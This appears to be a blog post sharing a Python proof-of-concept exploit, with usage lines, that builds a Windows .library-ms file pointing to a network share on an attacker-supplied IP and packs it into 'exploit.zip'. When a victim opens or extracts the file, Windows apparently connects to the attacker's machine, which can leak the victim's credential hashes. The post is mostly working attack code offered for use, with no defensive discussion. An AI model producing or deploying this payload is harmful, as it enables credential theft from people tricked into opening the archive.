usage
>>python poc.py
>>enter file name: your file name
>>enter IP: attacker IP
import os
import zipfile
def main():
file_name = input("Enter your file name: ")
ip_address = input("Enter IP (EX: 192.168.1.162): ")
library_content = f"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\\\{ip_address}\\shared</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
"""
library_file_name = f"{file_name}.library-ms"
with open(library_file_name, "w", encoding="utf-8") as f:
f.write(library_content)
with zipfile.ZipFile("exploit.zip", mode="w", compression=zipfile.ZIP_DEFLATED) as zipf:
zipf.write(library_file_name)
if os.path.exists(library_file_name):
os.remove(library_file_name)
print("completed")
if __name__ == "__main__":
main()
响应代码特征
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容